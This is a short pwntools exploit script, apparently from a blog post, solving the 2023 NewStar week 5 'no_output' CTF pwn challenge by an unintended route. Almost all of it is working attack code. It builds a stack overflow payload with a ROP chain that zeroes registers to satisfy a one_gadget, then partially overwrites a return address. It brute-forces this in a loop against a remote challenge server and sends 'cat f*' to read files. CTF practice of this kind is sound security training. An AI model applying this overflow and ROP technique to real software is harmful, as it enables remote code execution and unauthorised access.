from pwn import *
from LibcSearcher import *
context.log_level = "debug"
context.arch = 'amd64'
elf=ELF("./ouput")
pop_r12_r15=0x40124c
payload=b'a'*0x70+b'b'*0x8+p64(pop_r12_r15)+p64(0)+p64(0)+p64(0)+p64(0) #让r12 r15归零 满足one条件
payload+=p64(0x40124c)+p64(0)+p64(0)+p64(0)+p64(0)+p64(0x40124c)+p64(0)+p64(0)+p64(0)+p64(0)+p64(0x40124e)+p64(0)+p64(0)+p64(0) #占位 只要能往下跳就行
payload+=b'\xfe\x8a\x5e' #one
one=[0xe3afe,0xe3b01,0xe3b04]
#开爆
while 1:
try:
#io=process("./ouput")
io=remote('node4.buuoj.cn',25801)
#gdb.attach(io)
io.send(payload)
io.sendline('cat f*')
print(io.recv(1))
pause()
except Exception:
io.close()
continue
2023NewStar week5 pwn no_outpue非预期
最新推荐文章于 2024-07-15 16:27:13 发布